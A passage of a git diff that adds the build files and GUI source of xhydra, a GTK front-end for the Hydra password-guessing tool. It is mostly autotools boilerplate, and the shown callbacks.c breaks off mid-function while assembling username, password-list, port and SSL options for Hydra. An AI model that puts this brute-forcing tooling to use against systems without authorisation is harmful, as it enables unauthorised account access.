case $ac_dest in + default-1 ) test -z "$CONFIG_HEADERS" || echo timestamp > stamp-h ;; + esac +done +_ACEOF + +cat >>$CONFIG_STATUS <<\_ACEOF + +{ (exit 0); exit 0; } +_ACEOF +chmod +x $CONFIG_STATUS +ac_clean_files=$ac_clean_files_save + + +# configure is writing to config.log, and then calls config.status. +# config.status does its own redirection, appending to config.log. +# Unfortunately, on DOS this fails, as config.log is still kept open +# by configure, so config.status won't be able to write to it; its +# output is simply discarded. So we exec the FD to /dev/null, +# effectively closing config.log, so it can be properly (re)opened and +# appended to by config.status. When coming back to configure, we +# need to make the FD available again. +if test "$no_create" != yes; then + ac_cs_success=: + ac_config_status_args= + test "$silent" = yes && + ac_config_status_args="$ac_config_status_args --quiet" + exec 5>/dev/null + $SHELL $CONFIG_STATUS $ac_config_status_args || ac_cs_success=false + exec 5>>config.log + # Use ||, not &&, to avoid exiting from the if with $? = 1, which + # would make configure fail if this is the last instruction. + $ac_cs_success || { (exit 1); exit 1; } +fi + + diff --git a/hydra-gtk/configure.in b/hydra-gtk/configure.in new file mode 100755 index 0000000..e4fb923 --- /dev/null +++ b/hydra-gtk/configure.in @@ -0,0 +1,22 @@ +dnl Process this file with autoconf to produce a configure script. + +AC_INIT(configure.in) +AM_INIT_AUTOMAKE(xhydra, 0.1) +AM_CONFIG_HEADER(config.h) +AM_MAINTAINER_MODE + +AC_ISC_POSIX +AC_PROG_CC +AM_PROG_CC_STDC +AC_HEADER_STDC + +pkg_modules="gtk+-2.0 >= 2.0.0" +PKG_CHECK_MODULES(PACKAGE, [$pkg_modules]) +AC_SUBST(PACKAGE_CFLAGS) +AC_SUBST(PACKAGE_LIBS) + +AC_OUTPUT([ +Makefile +src/Makefile +]) + diff --git a/hydra-gtk/install-sh b/hydra-gtk/install-sh new file mode 100755 index 0000000..e9de238 --- /dev/null +++ b/hydra-gtk/install-sh @@ -0,0 +1,251 @@ +#!/bin/sh +# +# install - install a program, script, or datafile +# This comes from X11R5 (mit/util/scripts/install.sh). +# +# Copyright 1991 by the Massachusetts Institute of Technology +# +# Permission to use, copy, modify, distribute, and sell this software and its +# documentation for any purpose is hereby granted without fee, provided that +# the above copyright notice appear in all copies and that both that +# copyright notice and this permission notice appear in supporting +# documentation, and that the name of M.I.T. not be used in advertising or +# publicity pertaining to distribution of the software without specific, +# written prior permission. M.I.T. makes no representations about the +# suitability of this software for any purpose. It is provided "as is" +# without express or implied warranty. +# +# Calling this script install-sh is preferred over install.sh, to prevent +# `make' implicit rules from creating a file called install from it +# when there is no Makefile. +# +# This script is compatible with the BSD install script, but was written +# from scratch. It can only install one file at a time, a restriction +# shared with many OS's install programs. + + +# set DOITPROG to echo to test this script + +# Don't use :- since 4.3BSD and earlier shells don't like it. +doit="${DOITPROG-}" + + +# put in absolute paths if you don't have them in your path; or use env. vars. + +mvprog="${MVPROG-mv}" +cpprog="${CPPROG-cp}" +chmodprog="${CHMODPROG-chmod}" +chownprog="${CHOWNPROG-chown}" +chgrpprog="${CHGRPPROG-chgrp}" +stripprog="${STRIPPROG-strip}" +rmprog="${RMPROG-rm}" +mkdirprog="${MKDIRPROG-mkdir}" + +transformbasename="" +transform_arg="" +instcmd="$mvprog" +chmodcmd="$chmodprog 0755" +chowncmd="" +chgrpcmd="" +stripcmd="" +rmcmd="$rmprog -f" +mvcmd="$mvprog" +src="" +dst="" +dir_arg="" + +while [ x"$1" != x ]; do + case $1 in + -c) instcmd="$cpprog" + shift + continue;; + + -d) dir_arg=true + shift + continue;; + + -m) chmodcmd="$chmodprog $2" + shift + shift + continue;; + + -o) chowncmd="$chownprog $2" + shift + shift + continue;; + + -g) chgrpcmd="$chgrpprog $2" + shift + shift + continue;; + + -s) stripcmd="$stripprog" + shift + continue;; + + -t=*) transformarg=`echo $1 | sed 's/-t=//'` + shift + continue;; + + -b=*) transformbasename=`echo $1 | sed 's/-b=//'` + shift + continue;; + + *) if [ x"$src" = x ] + then + src=$1 + else + # this colon is to work around a 386BSD /bin/sh bug + : + dst=$1 + fi + shift + continue;; + esac +done + +if [ x"$src" = x ] +then + echo "install: no input file specified" + exit 1 +else + true +fi + +if [ x"$dir_arg" != x ]; then + dst=$src + src="" + + if [ -d $dst ]; then + instcmd=: + chmodcmd="" + else + instcmd=mkdir + fi +else + +# Waiting for this to be detected by the "$instcmd $src $dsttmp" command +# might cause directories to be created, which would be especially bad +# if $src (and thus $dsttmp) contains '*'. + + if [ -f $src -o -d $src ] + then + true + else + echo "install: $src does not exist" + exit 1 + fi + + if [ x"$dst" = x ] + then + echo "install: no destination specified" + exit 1 + else + true + fi + +# If destination is a directory, append the input filename; if your system +# does not like double slashes in filenames, you may need to add some logic + + if [ -d $dst ] + then + dst="$dst"/`basename $src` + else + true + fi +fi + +## this sed command emulates the dirname command +dstdir=`echo $dst | sed -e 's,[^/]*$,,;s,/$,,;s,^$,.,'` + +# Make sure that the destination directory exists. +# this part is taken from Noah Friedman's mkinstalldirs script + +# Skip lots of stat calls in the usual case. +if [ ! -d "$dstdir" ]; then +defaultIFS=' +' +IFS="${IFS-${defaultIFS}}" + +oIFS="${IFS}" +# Some sh's can't handle IFS=/ for some reason. +IFS='%' +set - `echo ${dstdir} | sed -e 's@/@%@g' -e 's@^%@/@'` +IFS="${oIFS}" + +pathcomp='' + +while [ $# -ne 0 ] ; do + pathcomp="${pathcomp}${1}" + shift + + if [ ! -d "${pathcomp}" ] ; + then + $mkdirprog "${pathcomp}" + else + true + fi + + pathcomp="${pathcomp}/" +done +fi + +if [ x"$dir_arg" != x ] +then + $doit $instcmd $dst && + + if [ x"$chowncmd" != x ]; then $doit $chowncmd $dst; else true ; fi && + if [ x"$chgrpcmd" != x ]; then $doit $chgrpcmd $dst; else true ; fi && + if [ x"$stripcmd" != x ]; then $doit $stripcmd $dst; else true ; fi && + if [ x"$chmodcmd" != x ]; then $doit $chmodcmd $dst; else true ; fi +else + +# If we're going to rename the final executable, determine the name now. + + if [ x"$transformarg" = x ] + then + dstfile=`basename $dst` + else + dstfile=`basename $dst $transformbasename | + sed $transformarg`$transformbasename + fi + +# don't allow the sed command to completely eliminate the filename + + if [ x"$dstfile" = x ] + then + dstfile=`basename $dst` + else + true + fi + +# Make a temp file name in the proper directory. + + dsttmp=$dstdir/#inst.$$# + +# Move or copy the file name to the temp name + + $doit $instcmd $src $dsttmp && + + trap "rm -f ${dsttmp}" 0 && + +# and set any options; do chmod last to preserve setuid bits + +# If any of these fail, we abort the whole thing. If we want to +# ignore errors from any of these, just make sure not to ignore +# errors from the above "$doit $instcmd $src $dsttmp" command. + + if [ x"$chowncmd" != x ]; then $doit $chowncmd $dsttmp; else true;fi && + if [ x"$chgrpcmd" != x ]; then $doit $chgrpcmd $dsttmp; else true;fi && + if [ x"$stripcmd" != x ]; then $doit $stripcmd $dsttmp; else true;fi && + if [ x"$chmodcmd" != x ]; then $doit $chmodcmd $dsttmp; else true;fi && + +# Now rename the file to the real destination. + + $doit $rmcmd -f $dstdir/$dstfile && + $doit $mvcmd $dsttmp $dstdir/$dstfile + +fi && + + +exit 0 diff --git a/hydra-gtk/make_xhydra.sh b/hydra-gtk/make_xhydra.sh new file mode 100755 index 0000000..cf4b8c0 --- /dev/null +++ b/hydra-gtk/make_xhydra.sh @@ -0,0 +1,20 @@ +#!/bin/bash +PKG_CONFIG_PATH=$PKG_CONFIG_PATH:/opt/gnome/lib/pkgconfig +export PKG_CONFIG_PATH +echo "Trying to compile xhydra now (hydra gtk gui) - dont worry if this fails, this is really optional ..." +./configure > /dev/null 2> errors +test -e Makefile || { + echo "Error: configure wasnt happy. Analyse this:" + cat errors + exit 1 +} +make > /dev/null 2> errors +test -e src/xhydra || { + echo "Error: could not compile. Analyse this:" + cat errors + echo + echo 'Do not worry, as I said, xhydra is really optional. ./hydra is ready to go!' + exit 0 +} +cp -v src/xhydra .. +echo "The GTK GUI is ready, type \"./xhydra\" to start" diff --git a/hydra-gtk/missing b/hydra-gtk/missing new file mode 100755 index 0000000..22e101a --- /dev/null +++ b/hydra-gtk/missing @@ -0,0 +1,198 @@ +#! /bin/sh +# Common stub for a few missing GNU programs while installing. +# Copyright (C) 1996, 1997, 2001, 2002 Free Software Foundation, Inc. +# Franc,ois Pinard , 1996. + +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation; either version 2, or (at your option) +# any later version. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. + +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA +# 02111-1307, USA. + +if test $# -eq 0; then + echo 1>&2 "Try \`$0 --help' for more information" + exit 1 +fi + +# In the cases where this matters, `missing' is being run in the +# srcdir already. +if test -f configure.in; then + configure_ac=configure.ac +else + configure_ac=configure.in +fi + +case "$1" in + + -h|--h|--he|--hel|--help) + echo "\ +$0 [OPTION]... PROGRAM [ARGUMENT]... + +Handle \`PROGRAM [ARGUMENT]...' for when PROGRAM is missing, or return an +error status if there is no known handling for PROGRAM. + +Options: + -h, --help display this help and exit + -v, --version output version information and exit + +Supported PROGRAM values: + aclocal touch file \`aclocal.m4' + autoconf touch file \`configure' + autoheader touch file \`config.h.in' + automake touch all \`Makefile.in' files + bison create \`y.tab.[ch]', if possible, from existing .[ch] + flex create \`lex.yy.c', if possible, from existing .c + lex create \`lex.yy.c', if possible, from existing .c + makeinfo touch the output file + yacc create \`y.tab.[ch]', if possible, from existing .[ch]" + ;; + + -v|--v|--ve|--ver|--vers|--versi|--versio|--version) + echo "missing - GNU libit 0.0" + ;; + + -*) + echo 1>&2 "$0: Unknown \`$1' option" + echo 1>&2 "Try \`$0 --help' for more information" + exit 1 + ;; + + aclocal*) + echo 1>&2 "\ +WARNING: \`$1' is missing on your system. You should only need it if + you modified \`acinclude.m4' or \`$configure_ac'. You might want + to install the \`Automake' and \`Perl' packages. Grab them from + any GNU archive site." + touch aclocal.m4 + ;; + + autoconf) + echo 1>&2 "\ +WARNING: \`$1' is missing on your system. You should only need it if + you modified \`$configure_ac'. You might want to install the + \`Autoconf' and \`GNU m4' packages. Grab them from any GNU + archive site." + touch configure + ;; + + autoheader) + echo 1>&2 "\ +WARNING: \`$1' is missing on your system. You should only need it if + you modified \`acconfig.h' or \`$configure_ac'. You might want + to install the \`Autoconf' and \`GNU m4' packages. Grab them + from any GNU archive site." + files=`sed -n 's/^[ ]*A[CM]_CONFIG_HEADER(\([^)]*\)).*/\1/p' $configure_ac` + test -z "$files" && files="config.h" + touch_files= + for f in $files; do + case "$f" in + *:*) touch_files="$touch_files "`echo "$f" | + sed -e 's/^[^:]*://' -e 's/:.*//'`;; + *) touch_files="$touch_files $f.in";; + esac + done + touch $touch_files + ;; + + automake*) + echo 1>&2 "\ +WARNING: \`$1' is missing on your system. You should only need it if + you modified \`Makefile.am', \`acinclude.m4' or \`$configure_ac'. + You might want to install the \`Automake' and \`Perl' packages. + Grab them from any GNU archive site." + find . -type f -name Makefile.am -print | + sed 's/\.am$/.in/' | + while read f; do touch "$f"; done + ;; + + bison|yacc) + echo 1>&2 "\ +WARNING: \`$1' is missing on your system. You should only need it if + you modified a \`.y' file. You may need the \`Bison' package + in order for those modifications to take effect. You can get + \`Bison' from any GNU archive site." + rm -f y.tab.c y.tab.h + if [ $# -ne 1 ]; then + eval LASTARG="\${$#}" + case "$LASTARG" in + *.y) + SRCFILE=`echo "$LASTARG" | sed 's/y$/c/'` + if [ -f "$SRCFILE" ]; then + cp "$SRCFILE" y.tab.c + fi + SRCFILE=`echo "$LASTARG" | sed 's/y$/h/'` + if [ -f "$SRCFILE" ]; then + cp "$SRCFILE" y.tab.h + fi + ;; + esac + fi + if [ ! -f y.tab.h ]; then + echo >y.tab.h + fi + if [ ! -f y.tab.c ]; then + echo 'main() { return 0; }' >y.tab.c + fi + ;; + + lex|flex) + echo 1>&2 "\ +WARNING: \`$1' is missing on your system. You should only need it if + you modified a \`.l' file. You may need the \`Flex' package + in order for those modifications to take effect. You can get + \`Flex' from any GNU archive site." + rm -f lex.yy.c + if [ $# -ne 1 ]; then + eval LASTARG="\${$#}" + case "$LASTARG" in + *.l) + SRCFILE=`echo "$LASTARG" | sed 's/l$/c/'` + if [ -f "$SRCFILE" ]; then + cp "$SRCFILE" lex.yy.c + fi + ;; + esac + fi + if [ ! -f lex.yy.c ]; then + echo 'main() { return 0; }' >lex.yy.c + fi + ;; + + makeinfo) + echo 1>&2 "\ +WARNING: \`$1' is missing on your system. You should only need it if + you modified a \`.texi' or \`.texinfo' file, or any other file + indirectly affecting the aspect of the manual. The spurious + call might also be the consequence of using a buggy \`make' (AIX, + DU, IRIX). You might want to install the \`Texinfo' package or + the \`GNU make' package. Grab either from any GNU archive site." + file=`echo "$*" | sed -n 's/.*-o \([^ ]*\).*/\1/p'` + if test -z "$file"; then + file=`echo "$*" | sed 's/.* \([^ ]*\) *$/\1/'` + file=`sed -n '/^@setfilename/ { s/.* \([^ ]*\) *$/\1/; p; q; }' $file` + fi + touch $file + ;; + + *) + echo 1>&2 "\ +WARNING: \`$1' is needed, and you do not seem to have it handy on your + system. You might have modified some files without having the + proper tools for further handling them. Check the \`README' file, + it often tells you about the needed prerequirements for installing + this package. You may also peek at any GNU archive site, in case + some other package would contain this missing \`$1' program." + exit 1 + ;; +esac + +exit 0 diff --git a/hydra-gtk/mkinstalldirs b/hydra-gtk/mkinstalldirs new file mode 100755 index 0000000..4f58503 --- /dev/null +++ b/hydra-gtk/mkinstalldirs @@ -0,0 +1,40 @@ +#! /bin/sh +# mkinstalldirs --- make directory hierarchy +# Author: Noah Friedman +# Created: 1993-05-16 +# Public domain + +# $Id: mkinstalldirs,v 1.13 1999/01/05 03:18:55 bje Exp $ + +errstatus=0 + +for file +do + set fnord `echo ":$file" | sed -ne 's/^:\//#/;s/^://;s/\// /g;s/^#/\//;p'` + shift + + pathcomp= + for d + do + pathcomp="$pathcomp$d" + case "$pathcomp" in + -* ) pathcomp=./$pathcomp ;; + esac + + if test ! -d "$pathcomp"; then + echo "mkdir $pathcomp" + + mkdir "$pathcomp" || lasterr=$? + + if test ! -d "$pathcomp"; then + errstatus=$lasterr + fi + fi + + pathcomp="$pathcomp/" + done +done + +exit $errstatus + +# mkinstalldirs ends here diff --git a/hydra-gtk/src/Makefile.am b/hydra-gtk/src/Makefile.am new file mode 100755 index 0000000..03984ce --- /dev/null +++ b/hydra-gtk/src/Makefile.am @@ -0,0 +1,17 @@ +## Process this file with automake to produce Makefile.in + +INCLUDES = \ + -DPACKAGE_DATA_DIR=\""$(datadir)"\" \ + -DPACKAGE_LOCALE_DIR=\""$(prefix)/$(DATADIRNAME)/locale"\" \ + @PACKAGE_CFLAGS@ + +bin_PROGRAMS = xhydra + +xhydra_SOURCES = \ + main.c \ + support.c support.h \ + interface.c interface.h \ + callbacks.c callbacks.h + +xhydra_LDADD = @PACKAGE_LIBS@ + diff --git a/hydra-gtk/src/Makefile.in b/hydra-gtk/src/Makefile.in new file mode 100755 index 0000000..a37ab9e --- /dev/null +++ b/hydra-gtk/src/Makefile.in @@ -0,0 +1,319 @@ +# Makefile.in generated automatically by automake 1.4-p6 from Makefile.am + +# Copyright (C) 1994, 1995-8, 1999, 2001 Free Software Foundation, Inc. +# This Makefile.in is free software; the Free Software Foundation +# gives unlimited permission to copy and/or distribute it, +# with or without modifications, as long as this notice is preserved. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY, to the extent permitted by law; without +# even the implied warranty of MERCHANTABILITY or FITNESS FOR A +# PARTICULAR PURPOSE. + + +SHELL = @SHELL@ + +srcdir = @srcdir@ +top_srcdir = @top_srcdir@ +VPATH = @srcdir@ +prefix = @prefix@ +exec_prefix = @exec_prefix@ + +bindir = @bindir@ +sbindir = @sbindir@ +libexecdir = @libexecdir@ +datadir = @datadir@ +sysconfdir = @sysconfdir@ +sharedstatedir = @sharedstatedir@ +localstatedir = @localstatedir@ +libdir = @libdir@ +infodir = @infodir@ +mandir = @mandir@ +includedir = @includedir@ +oldincludedir = /usr/include + +DESTDIR = + +pkgdatadir = $(datadir)/@PACKAGE@ +pkglibdir = $(libdir)/@PACKAGE@ +pkgincludedir = $(includedir)/@PACKAGE@ + +top_builddir = .. + +ACLOCAL = @ACLOCAL@ +AUTOCONF = @AUTOCONF@ +AUTOMAKE = @AUTOMAKE@ +AUTOHEADER = @AUTOHEADER@ + +INSTALL = @INSTALL@ +INSTALL_PROGRAM = @INSTALL_PROGRAM@ $(AM_INSTALL_PROGRAM_FLAGS) +INSTALL_DATA = @INSTALL_DATA@ +INSTALL_SCRIPT = @INSTALL_SCRIPT@ +transform = @program_transform_name@ + +NORMAL_INSTALL = : +PRE_INSTALL = : +POST_INSTALL = : +NORMAL_UNINSTALL = : +PRE_UNINSTALL = : +POST_UNINSTALL = : +CC = @CC@ +MAINT = @MAINT@ +MAKEINFO = @MAKEINFO@ +PACKAGE = @PACKAGE@ +PACKAGE_CFLAGS = @PACKAGE_CFLAGS@ +PACKAGE_LIBS = @PACKAGE_LIBS@ +PKG_CONFIG = @PKG_CONFIG@ +VERSION = @VERSION@ + +INCLUDES = -DPACKAGE_DATA_DIR=\""$(datadir)"\" -DPACKAGE_LOCALE_DIR=\""$(prefix)/$(DATADIRNAME)/locale"\" @PACKAGE_CFLAGS@ + + +bin_PROGRAMS = xhydra + +xhydra_SOURCES = main.c support.c support.h interface.c interface.h callbacks.c callbacks.h + + +xhydra_LDADD = @PACKAGE_LIBS@ +mkinstalldirs = $(SHELL) $(top_srcdir)/mkinstalldirs +CONFIG_HEADER = ../config.h +CONFIG_CLEAN_FILES = +PROGRAMS = $(bin_PROGRAMS) + + +DEFS = @DEFS@ -I. -I$(srcdir) -I.. +CPPFLAGS = @CPPFLAGS@ +LDFLAGS = @LDFLAGS@ +LIBS = @LIBS@ +xhydra_OBJECTS = main.o support.o interface.o callbacks.o +xhydra_DEPENDENCIES = +xhydra_LDFLAGS = +CFLAGS = @CFLAGS@ +COMPILE = $(CC) $(DEFS) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) +CCLD = $(CC) +LINK = $(CCLD) $(AM_CFLAGS) $(CFLAGS) $(LDFLAGS) -o $@ +DIST_COMMON = Makefile.am Makefile.in + + +DISTFILES = $(DIST_COMMON) $(SOURCES) $(HEADERS) $(TEXINFOS) $(EXTRA_DIST) + +TAR = tar +GZIP_ENV = --best +DEP_FILES = .deps/callbacks.P .deps/interface.P .deps/main.P \ +.deps/support.P +SOURCES = $(xhydra_SOURCES) +OBJECTS = $(xhydra_OBJECTS) + +all: all-redirect +.SUFFIXES: +.SUFFIXES: .S .c .o .s +$(srcdir)/Makefile.in: @MAINTAINER_MODE_TRUE@ Makefile.am $(top_srcdir)/configure.in $(ACLOCAL_M4) + cd $(top_srcdir) && $(AUTOMAKE) --gnu src/Makefile + +Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status $(BUILT_SOURCES) + cd $(top_builddir) \ + && CONFIG_FILES=$(subdir)/$@ CONFIG_HEADERS= $(SHELL) ./config.status + + +mostlyclean-binPROGRAMS: + +clean-binPROGRAMS: + -test -z "$(bin_PROGRAMS)" || rm -f $(bin_PROGRAMS) + +distclean-binPROGRAMS: + +maintainer-clean-binPROGRAMS: + +install-binPROGRAMS: $(bin_PROGRAMS) + @$(NORMAL_INSTALL) + $(mkinstalldirs) $(DESTDIR)$(bindir) + @list='$(bin_PROGRAMS)'; for p in $$list; do \ + if test -f $$p; then \ + echo " $(INSTALL_PROGRAM) $$p $(DESTDIR)$(bindir)/`echo $$p|sed 's/$(EXEEXT)$$//'|sed '$(transform)'|sed 's/$$/$(EXEEXT)/'`"; \ + $(INSTALL_PROGRAM) $$p $(DESTDIR)$(bindir)/`echo $$p|sed 's/$(EXEEXT)$$//'|sed '$(transform)'|sed 's/$$/$(EXEEXT)/'`; \ + else :; fi; \ + done + +uninstall-binPROGRAMS: + @$(NORMAL_UNINSTALL) + list='$(bin_PROGRAMS)'; for p in $$list; do \ + rm -f $(DESTDIR)$(bindir)/`echo $$p|sed 's/$(EXEEXT)$$//'|sed '$(transform)'|sed 's/$$/$(EXEEXT)/'`; \ + done + +.s.o: + $(COMPILE) -c $< + +.S.o: + $(COMPILE) -c $< + +mostlyclean-compile: + -rm -f *.o core *.core + +clean-compile: + +distclean-compile: + -rm -f *.tab.c + +maintainer-clean-compile: + +xhydra: $(xhydra_OBJECTS) $(xhydra_DEPENDENCIES) + @rm -f xhydra + $(LINK) $(xhydra_LDFLAGS) $(xhydra_OBJECTS) $(xhydra_LDADD) $(LIBS) + +tags: TAGS + +ID: $(HEADERS) $(SOURCES) $(LISP) + list='$(SOURCES) $(HEADERS)'; \ + unique=`for i in $$list; do echo $$i; done | \ + awk ' { files[$$0] = 1; } \ + END { for (i in files) print i; }'`; \ + here=`pwd` && cd $(srcdir) \ + && mkid -f$$here/ID $$unique $(LISP) + +TAGS: $(HEADERS) $(SOURCES) $(TAGS_DEPENDENCIES) $(LISP) + tags=; \ + here=`pwd`; \ + list='$(SOURCES) $(HEADERS)'; \ + unique=`for i in $$list; do echo $$i; done | \ + awk ' { files[$$0] = 1; } \ + END { for (i in files) print i; }'`; \ + test -z "$(ETAGS_ARGS)$$unique$(LISP)$$tags" \ + || (cd $(srcdir) && etags $(ETAGS_ARGS) $$tags $$unique $(LISP) -o $$here/TAGS) + +mostlyclean-tags: + +clean-tags: + +distclean-tags: + -rm -f TAGS ID + +maintainer-clean-tags: + +distdir = $(top_builddir)/$(PACKAGE)-$(VERSION)/$(subdir) + +subdir = src + +distdir: $(DISTFILES) + here=`cd $(top_builddir) && pwd`; \ + top_distdir=`cd $(top_distdir) && pwd`; \ + distdir=`cd $(distdir) && pwd`; \ + cd $(top_srcdir) \ + && $(AUTOMAKE) --include-deps --build-dir=$$here --srcdir-name=$(top_srcdir) --output-dir=$$top_distdir --gnu src/Makefile + @for file in $(DISTFILES); do \ + d=$(srcdir); \ + if test -d $$d/$$file; then \ + cp -pr $$d/$$file $(distdir)/$$file; \ + else \ + test -f $(distdir)/$$file \ + || ln $$d/$$file $(distdir)/$$file 2> /dev/null \ + || cp -p $$d/$$file $(distdir)/$$file || :; \ + fi; \ + done + +DEPS_MAGIC := $(shell mkdir .deps > /dev/null 2>&1 || :) + +-include $(DEP_FILES) + +mostlyclean-depend: + +clean-depend: + +distclean-depend: + -rm -rf .deps + +maintainer-clean-depend: + +%.o: %.c + @echo '$(COMPILE) -c $<'; \ + $(COMPILE) -Wp,-MD,.deps/$(*F).pp -c $< + @-cp .deps/$(*F).pp .deps/$(*F).P; \ + tr ' ' '\012' < .deps/$(*F).pp \ + | sed -e 's/^\\$$//' -e '/^$$/ d' -e '/:$$/ d' -e 's/$$/ :/' \ + >> .deps/$(*F).P; \ + rm .deps/$(*F).pp + +%.lo: %.c + @echo '$(LTCOMPILE) -c $<'; \ + $(LTCOMPILE) -Wp,-MD,.deps/$(*F).pp -c $< + @-sed -e 's/^\([^:]*\)\.o[ ]*:/\1.lo \1.o :/' \ + < .deps/$(*F).pp > .deps/$(*F).P; \ + tr ' ' '\012' < .deps/$(*F).pp \ + | sed -e 's/^\\$$//' -e '/^$$/ d' -e '/:$$/ d' -e 's/$$/ :/' \ + >> .deps/$(*F).P; \ + rm -f .deps/$(*F).pp +info-am: +info: info-am +dvi-am: +dvi: dvi-am +check-am: all-am +check: check-am +installcheck-am: +installcheck: installcheck-am +install-exec-am: install-binPROGRAMS +install-exec: install-exec-am + +install-data-am: +install-data: install-data-am + +install-am: all-am + @$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am +install: install-am +uninstall-am: uninstall-binPROGRAMS +uninstall: uninstall-am +all-am: Makefile $(PROGRAMS) +all-redirect: all-am +install-strip: + $(MAKE) $(AM_MAKEFLAGS) AM_INSTALL_PROGRAM_FLAGS=-s install +installdirs: + $(mkinstalldirs) $(DESTDIR)$(bindir) + + +mostlyclean-generic: + +clean-generic: + +distclean-generic: + -rm -f Makefile $(CONFIG_CLEAN_FILES) + -rm -f config.cache config.log stamp-h stamp-h[0-9]* + +maintainer-clean-generic: +mostlyclean-am: mostlyclean-binPROGRAMS mostlyclean-compile \ + mostlyclean-tags mostlyclean-depend mostlyclean-generic + +mostlyclean: mostlyclean-am + +clean-am: clean-binPROGRAMS clean-compile clean-tags clean-depend \ + clean-generic mostlyclean-am + +clean: clean-am + +distclean-am: distclean-binPROGRAMS distclean-compile distclean-tags \ + distclean-depend distclean-generic clean-am + +distclean: distclean-am + +maintainer-clean-am: maintainer-clean-binPROGRAMS \ + maintainer-clean-compile maintainer-clean-tags \ + maintainer-clean-depend maintainer-clean-generic \ + distclean-am + @echo "This command is intended for maintainers to use;" + @echo "it deletes files that may require special tools to rebuild." + +maintainer-clean: maintainer-clean-am + +.PHONY: mostlyclean-binPROGRAMS distclean-binPROGRAMS clean-binPROGRAMS \ +maintainer-clean-binPROGRAMS uninstall-binPROGRAMS install-binPROGRAMS \ +mostlyclean-compile distclean-compile clean-compile \ +maintainer-clean-compile tags mostlyclean-tags distclean-tags \ +clean-tags maintainer-clean-tags distdir mostlyclean-depend \ +distclean-depend clean-depend maintainer-clean-depend info-am info \ +dvi-am dvi check check-am installcheck-am installcheck install-exec-am \ +install-exec install-data-am install-data install-am install \ +uninstall-am uninstall all-redirect all-am all installdirs \ +mostlyclean-generic distclean-generic clean-generic \ +maintainer-clean-generic clean mostlyclean distclean maintainer-clean + + +# Tell versions [3.59,3.63) of GNU make to not export all variables. +# Otherwise a system limit (for SysV at least) may be exceeded. +.NOEXPORT: diff --git a/hydra-gtk/src/callbacks.c b/hydra-gtk/src/callbacks.c new file mode 100755 index 0000000..d8ecfa0 --- /dev/null +++ b/hydra-gtk/src/callbacks.c @@ -0,0 +1,682 @@ + +/* + * This file handles all that needs to be done... + * Some stuff is stolen from gcombust since I never used pipes... ok, i + * only used them in reallife :) + */ + +#ifdef HAVE_CONFIG_H +#include +#endif + +#include + +#include "callbacks.h" +#include "interface.h" +#include "support.h" + +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include + +int hydra_pid = 0; + +char port[10]; +char tasks[10]; +char timeout[10]; +char smbparm[12]; +char snmpparm[4]; +char sapr3id[4]; +char passLoginNull[4]; + + +#define BUF_S 1024 + +void hydra_select_file(GtkEntry * widget, char *text) { +#ifdef GTK_TYPE_FILE_CHOOSER + GtkWidget *dialog; + char *filename; + + dialog = gtk_file_chooser_dialog_new(text, (GtkWindow *) wndMain, GTK_FILE_CHOOSER_ACTION_OPEN, + GTK_STOCK_OPEN, GTK_RESPONSE_ACCEPT, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, NULL); + + if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_ACCEPT) { + filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog)); + gtk_entry_set_text(widget, filename); + g_free(filename); + } + gtk_widget_destroy(dialog); +#endif +} + +int hydra_get_options(char *options[]) { + /* get the stuff from the gtk entries... */ + int i = 1; + GtkWidget *widget; + GtkWidget *widget2; + int j; + gchar *tmp; + GString *a; + + options[0] = HYDRA_BIN; + + /* get the port */ + widget = lookup_widget(GTK_WIDGET(wndMain), "spnPort"); + j = gtk_spin_button_get_value_as_int((GtkSpinButton *) widget); + if (j != 0) { + snprintf(port, 10, "%d", j); + options[i++] = "-s"; + options[i++] = port; + } + + /* prefer ipv6 */ + widget = lookup_widget(GTK_WIDGET(wndMain), "chkIPV6"); + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + options[i++] = "-6"; + } + + /* use SSL? */ + widget = lookup_widget(GTK_WIDGET(wndMain), "chkSSL"); + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + options[i++] = "-S"; + } + + /* be verbose? */ + widget = lookup_widget(GTK_WIDGET(wndMain), "chkVerbose"); + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + options[i++] = "-v"; + } + + /* show attempts */ + widget = lookup_widget(GTK_WIDGET(wndMain), "chkAttempts"); + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + options[i++] = "-V"; + } + + /* debug mode? */ + widget = lookup_widget(GTK_WIDGET(wndMain), "chkDebug"); + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + options[i++] = "-d"; + } + + /* use colon separated list? */ + widget = lookup_widget(GTK_WIDGET(wndMain), "chkColon"); + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + options[i++] = "-C"; + widget = lookup_widget(GTK_WIDGET(wndMain), "entColonFile"); + options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget); + + } else { + /* get the username, or username list */ + widget = lookup_widget(GTK_WIDGET(wndMain), "radioUsername1"); + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + options[i++] = "-l"; + widget = lookup_widget(GTK_WIDGET(wndMain), "entUsername"); + options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget); + } else { + options[i++] = "-L"; + widget = lookup_widget(GTK_WIDGET(wndMain), "entUsernameFile"); + options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget); + } + + /* get the pass, or pass list */ + widget = lookup_widget(GTK_WIDGET(wndMain), "radioPass1"); + if (gtk_toggle_button_get_active((GtkToggleButton *) widget)) { + options[i++] = "-p"; + widget = lookup_widget(GTK_WIDGET(wndMain), "entPass"); + options[i++] = (char *) gtk_entry_get_text((GtkEntry *) widget); + } else { + options[i++] = "-P"; + widget = 